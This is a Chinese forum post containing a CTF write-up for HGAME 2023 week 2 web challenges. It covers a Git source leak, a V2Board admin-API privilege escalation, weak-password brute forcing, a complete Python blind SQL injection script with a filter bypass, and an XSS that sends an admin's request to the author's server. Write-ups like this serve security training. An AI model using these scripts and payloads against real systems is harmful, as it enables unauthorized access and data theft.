论坛 › 网络安全 › HGAME2023_WP_WEEK2

怀念夏天 发表于 2023-2-3 06:31:34

HGAME2023_WP_WEEK2

Git LeakageGithack一波带走,下载得到flag
https://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120210941506-1789369717.png
v2board搜索得知V2Board存在越权漏洞，随便注册个账号拿到authorization
访问/api/v1/admin/user/fetch?pageSize=10&current=1
https://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120211010819-1420683548.png  
 拿到token值，hgame{39d580e71705f6abac9a414def74c466}
Search Commodity弱口令爆破得到密码admin123，登录进去是一个搜索框，很明显是sql注入，bp构造一个search_id=1$select$*2，fuzz一下，发现好多都被过滤为空，这里给出部分https://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120094607200-1914778539.png 
 https://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120094613683-1070526718.png
这里发现大写能够绕过过滤，我们写一个盲注脚本
import requests
import string
strs = string.printable
headers = {
    'Cookie': 'SESSION=MTY3MzY2MDExM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18adCvaHER65QoUwkQqK1elOtFjUAT9stHSgpZfPrUWik='
}
flag = ''
def attack(url):
    global flag
    for i in range(1, 100):
      for j in strs:
            if j == '%':
                continue
            tmp = ord(j)
            payload = 'DATABASE()'
            payload1 = 'SELECT(GROUP_CONCAT(TABLE_NAME))FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA)like(DATABASE())'
            payload2 = "SELECT(GROUP_CONCAT(COLUMN_NAME))FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME)like('5ecret15here')"
            payload3 = 'SELECT(f14gggg1shere)FROM(5ecret15here)'
            data = {
                'search_id': f"0||((ascii(substr(({payload3}),{i},1)))like({tmp}))"
            }
            r = requests.post(url, data=data, headers=headers)
            if 'hard disk' in r.text:
                flag += j
                print(flag)
                break
      if flag.endswith('}'):
            break
if __name__ == '__main__':
    url = 'http://week-2.hgame.lwsec.cn:32034/search'
    attack(url)最后flag为：hgame{4_M4n_WH0_Kn0ws_We4k-P4ssW0rd_And_SQL!}Designer附件下载下来是一套js源码，看index.js，/user/register伪造ip无果,应该是xsshttps://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120094850368-1978921943.png 
 我们写一个xhr请求，让本地来访问就能成功伪造ip，得到true flag
https://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120095006861-641596838.png
利用在线xss_platform,把代码丢里头，Box shadow里填入xss攻击payload，注意这里要闭合下标签，这里有个坑，得先preview一下再share，才能触发本地访问，不知道是不是就我一个人有这个问题https://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120095049155-1788653690.png 
 最后我们在vps的web日志里找到请求信息，本想直接输出来着，但没成功
https://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120095246200-1926564383.png
jwt解密得到flag
https://img2023.cnblogs.com/blog/2746479/202301/2746479-20230120211136244-553474699.png
 
 
 
 

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！

查看完整版本: HGAME2023_WP_WEEK2